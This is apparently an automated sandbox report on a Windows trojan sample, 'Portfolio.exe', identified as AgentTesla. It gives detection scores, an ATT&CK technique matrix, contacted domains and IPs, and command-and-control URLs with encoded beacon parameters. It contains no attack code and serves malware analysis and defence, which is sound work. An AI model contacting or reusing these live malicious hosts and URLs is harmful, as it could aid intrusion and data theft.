Source: Yara match	File source: 0000000E.00000002.501316678.0000000004E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.252926038.00000000045D5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.Portfolio.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Portfolio.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Rootkit1	Credential API Hooking1	Security Software Discovery221	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion31	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection612	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information4	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing3	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Portfolio.exe	34%	Virustotal		Browse
Portfolio.exe	17%	ReversingLabs	Win32.Trojan.AgentTesla
Portfolio.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.Portfolio.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
scaledsales.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cnnte	0%	Avira URL Cloud	safe
http://www.sajatypeworks.comif13	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.founder.com.cn/cnorm	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://en.wg	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.fonts.comic	0%	URL Reputation	safe
http://www.fonts.comic	0%	URL Reputation	safe
http://www.fonts.comic	0%	URL Reputation	safe
http://www.fonts.com-uK2	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/ana	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.comd	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.fonts.comc	0%	URL Reputation	safe
http://www.fonts.comc	0%	URL Reputation	safe
http://www.fonts.comc	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Zp	0%	Avira URL Cloud	safe
www.fromthepittothepitts.com/dwj/	0%	Avira URL Cloud	safe
http://www.sandoll.co.krN.TTF	0%	Avira URL Cloud	safe
http://www.sandoll.co.krs.	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/tp&	0%	Avira URL Cloud	safe
http://www.fontbureau.come.com	0%	URL Reputation	safe
http://www.fontbureau.come.com	0%	URL Reputation	safe
http://www.fontbureau.come.com	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.scaledsales.com/dwj/?Cj=lN985vvxrLh4&HTrLdvY=jCwgb33wmR2YDM1wuLgRTH38yeb9sMyK3XA0ZXE7/yU9OdwyZBI+RqEK8elpwbEptz+b	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/ip	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fromthepittothepitts.com/dwj/?HTrLdvY=e+9w//LrkNQAvat7yjjfVebmP7O5RIC5nL700LrPx65Ls1GCtX2Cw2Ubn7E5A1TTieM1&Cj=lN985vvxrLh4	0%	Avira URL Cloud	safe
http://www.timcrozier.com/dwj/?Cj=lN985vvxrLh4&HTrLdvY=vjdFX+deElwkJL3jjCyofcRGlviK7hY6fmHNPu6niYhLdTNZ+9C3ClVYQHWQZWwEwEGo	0%	Avira URL Cloud	safe
http://www.fonts.comF	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.sandoll.co.kr0l	0%	Avira URL Cloud	safe
http://www.tiro.comh	0%	Avira URL Cloud	safe
http://www.tiro.comc	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/1	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnFe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fromthepittothepitts.com	72.167.241.46	true	true		unknown
www.timcrozier.com	168.206.243.213	true	true		unknown
scaledsales.com	34.102.136.180	true	false	0%, Virustotal, Browse	unknown
www.andersensweddinginvitations.com	66.96.162.147	true	false		unknown
www.scaledsales.com	unknown	unknown	true		unknown
www.fromthepittothepitts.com	unknown	unknown	true		unknown
clientconfig.passport.net	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.fromthepittothepitts.com/dwj/	true	Avira URL Cloud: safe	low
http://www.scaledsales.com/dwj/?Cj=lN985vvxrLh4&HTrLdvY=jCwgb33wmR2YDM1wuLgRTH38yeb9sMyK3XA0ZXE7/yU9OdwyZBI+RqEK8elpwbEptz+b	false	Avira URL Cloud: safe	unknown
http://www.fromthepittothepitts.com/dwj/?HTrLdvY=e+9w//LrkNQAvat7yjjfVebmP7O5RIC5nL700LrPx65Ls1GCtX2Cw2Ubn7E5A1TTieM1&Cj=lN985vvxrLh4	true	Avira URL Cloud: safe	unknown
http://www.timcrozier.com/dwj/?Cj=lN985vvxrLh4&HTrLdvY=vjdFX+deElwkJL3jjCyofcRGlviK7hY6fmHNPu6niYhLdTNZ+9C3ClVYQHWQZWwEwEGo	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cnnte	Portfolio.exe, 00000000.00000003.230728863.0000000006454000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.comif13	Portfolio.exe, 00000000.00000003.228912347.000000000646B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4	Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designersP	Portfolio.exe, 00000000.00000003.233964245.0000000006459000.00000004.00000001.sdmp	false		high
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cnorm	Portfolio.exe, 00000000.00000003.230728863.0000000006454000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	Portfolio.exe, 00000000.00000003.228912347.000000000646B000.00000004.00000001.sdmp, Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://en.wg	Portfolio.exe, 00000000.00000003.228584223.0000000001B0D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/cThe	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fonts.comic	Portfolio.exe, 00000000.00000003.229044893.000000000646B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fonts.com-uK2	Portfolio.exe, 00000000.00000003.229070547.000000000646B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/ana	Portfolio.exe, 00000000.00000003.232390770.0000000006454000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fonts.com	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.comd	Portfolio.exe, 00000000.00000003.228912347.000000000646B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Portfolio.exe, 00000000.00000002.249960275.0000000003421000.00000004.00000001.sdmp, Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	Portfolio.exe, 00000000.00000002.255677929.0000000006450000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fonts.comc	Portfolio.exe, 00000000.00000003.229124720.000000000646B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8g	Portfolio.exe, 00000000.00000003.234330110.000000000645D000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/Zp	Portfolio.exe, 00000000.00000003.232390770.0000000006454000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sandoll.co.krN.TTF	Portfolio.exe, 00000000.00000003.230122037.0000000006459000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sandoll.co.krs.	Portfolio.exe, 00000000.00000003.230122037.0000000006459000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	Portfolio.exe, 00000000.00000003.232390770.0000000006454000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/tp&	Portfolio.exe, 00000000.00000003.232390770.0000000006454000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.come.com	Portfolio.exe, 00000000.00000002.255677929.0000000006450000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/	Portfolio.exe, 00000000.00000003.231020561.0000000006454000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/ip	Portfolio.exe, 00000000.00000003.232390770.0000000006454000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fonts.comF	Portfolio.exe, 00000000.00000003.229070547.000000000646B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	Portfolio.exe, 00000000.00000003.232390770.0000000006454000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Portfolio.exe, 00000000.00000002.255795248.0000000006540000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.276691201.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr0l	Portfolio.exe, 00000000.00000003.230122037.0000000006459000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.comh	Portfolio.exe, 00000000.00000003.229361711.000000000646B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.comc	Portfolio.exe, 00000000.00000003.229361711.000000000646B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/1	Portfolio.exe, 00000000.00000003.231020561.0000000006454000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnFe	Portfolio.exe, 00000000.00000003.230728863.0000000006454000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
72.167.241.46	fromthepittothepitts.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
34.102.136.180	scaledsales.com	United States	15169	GOOGLEUS	false
168.206.243.213	www.timcrozier.com	South Africa	137951	CLAYERLIMITED-AS-APClayerLimitedHK	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385265
Start date:	12.04.2021
Start time:	09:16:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Portfolio.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@5/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 6.4% (good quality ratio 5.6%) Quality average: 71.1% Quality standard deviation: 32.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 115 Number of non-executed functions: 156
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 93.184.220.29, 88.221.62.148, 204.79.197.200, 13.107.21.200, 92.123.150.225, 92.122.145.220, 13.88.21.125, 52.255.188.83, 184.30.20.56, 20.50.102.62, 52.147.198.201, 92.122.213.247, 92.122.213.194, 20.54.26.129 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, e13551.dscg.akamaiedge.net, msagfx.live.com-6.edgekey.net, e12564.dspb.akamaiedge.net, authgfx.msa.akadns6.net, go.microsoft.com, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:17:11	API Interceptor	1x Sleep call for process: Portfolio.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
72.167.241.46	PURCHASE ORDER _675765000.exe	Get hash	malicious	Browse	www.trebal-dev.com/boit/?k2MHoV=Ggwh2S5XlqD5vA3PM5hGj7QvI9b2kuXYTZe3tRUUW+yIJGQCtmpU8frTWQLsaFulbOHg&H0DpbV=zL3h7bmPUhx
	New Order-756678 SEG.exe	Get hash	malicious	Browse	www.trebal-dev.com/boit/?IbwLbh=jrQHqvKpqn4&MVc=Ggwh2S5XlqD5vA3PM5hGj7QvI9b2kuXYTZe3tRUUW+yIJGQCtmpU8frTWQLsaFulbOHg
	probablyloki.exe	Get hash	malicious	Browse	www.rapmu.com/wle/?q48=OurScjkzGM10DPuZZmhDUnYIpbTNr+NKkQ4VWTbl9vtjbvHdc8zmintMk10LNbqTHBeb&Un1l7=apa0hp7P3Z
	123687197K13496L3.xlsm	Get hash	malicious	Browse	3queensacademy.com/kuxbng.gif
	INV_187067244.doc	Get hash	malicious	Browse	deliverisrapido.com/hue73vl.gif

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.andersensweddinginvitations.com	MT103_004758.exe	Get hash	malicious	Browse	66.96.162.147

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLAYERLIMITED-AS-APClayerLimitedHK	36ne6xnkop.exe	Get hash	malicious	Browse	160.121.176.84
	Wire Transfer Update.exe	Get hash	malicious	Browse	155.159.49.13
	New order.exe	Get hash	malicious	Browse	155.159.49.22
	Swift.exe	Get hash	malicious	Browse	164.88.176.186
	DLVq1O2dUG.exe	Get hash	malicious	Browse	155.159.130.142
	KL9fcbfrMB.exe	Get hash	malicious	Browse	160.121.176.84
	New _Items.Xlsx.Pdf.exe	Get hash	malicious	Browse	155.159.49.38
	1LHKlbcoW3.exe	Get hash	malicious	Browse	160.121.176.84
	Product list.xlsx	Get hash	malicious	Browse	160.121.218.30
	PO-108561.exe	Get hash	malicious	Browse	160.122.148.216
	ZwNJI24QAf.exe	Get hash	malicious	Browse	160.121.176.84
	pcBhOkLiD3.exe	Get hash	malicious	Browse	160.121.176.84
	loMStbzHSP.exe	Get hash	malicious	Browse	160.121.176.84
	PAYMENT_.exe	Get hash	malicious	Browse	160.121.177.117
	Shipping Documents.exe	Get hash	malicious	Browse	160.122.148.213
	Shipping Documents.exe	Get hash	malicious	Browse	168.206.218.50
	PO_210316.exe.exe	Get hash	malicious	Browse	168.206.30.139
	PO_20210310.exe	Get hash	malicious	Browse	168.206.56.51
	PO # 5524792.exe	Get hash	malicious	Browse	164.88.178.142
	i7DmAbXBCN.exe	Get hash	malicious	Browse	160.122.149.212
AS-26496-GO-DADDY-COM-LLCUS	12042021493876783,xlsx.exe	Get hash	malicious	Browse	184.168.131.241
	CIVIP-8287377.exe	Get hash	malicious	Browse	184.168.177.1
	MT103_004758.exe	Get hash	malicious	Browse	184.168.131.241
	Payment advice IN18663Q0031139I.xlsx	Get hash	malicious	Browse	184.168.131.241
	Swift002.exe	Get hash	malicious	Browse	50.62.160.230
	36ne6xnkop.exe	Get hash	malicious	Browse	184.168.131.241
	56UDmImzPe.dll	Get hash	malicious	Browse	107.180.90.10
	Shipping doc&_B-Landen.exe	Get hash	malicious	Browse	50.62.137.41
	Statement-ID261179932209970.vbs	Get hash	malicious	Browse	148.72.208.50
	_.ryder.com._1602499153.666014.dll	Get hash	malicious	Browse	166.62.30.150
	mW07jhVxX5.exe	Get hash	malicious	Browse	184.168.131.241
	jEXf5uQ3DE.exe	Get hash	malicious	Browse	184.168.131.241
	giATspz5dw.exe	Get hash	malicious	Browse	184.168.131.241
	cV1uaQeOGg.exe	Get hash	malicious	Browse	107.180.50.167
	documents-351331057.xlsm	Get hash	malicious	Browse	173.201.252.173
	documents-351331057.xlsm	Get hash	malicious	Browse	173.201.252.173
	documents-1819557117.xlsm	Get hash	malicious	Browse	173.201.252.173
	documents-1819557117.xlsm	Get hash	malicious	Browse	173.201.252.173
	aqbieGXkIX.doc	Get hash	malicious	Browse	198.71.233.104
	SwiftMT103.xlsx	Get hash	malicious	Browse	184.168.131.241

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Portfolio.exe.log Download File
Process:	C:\Users\user\Desktop\Portfolio.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
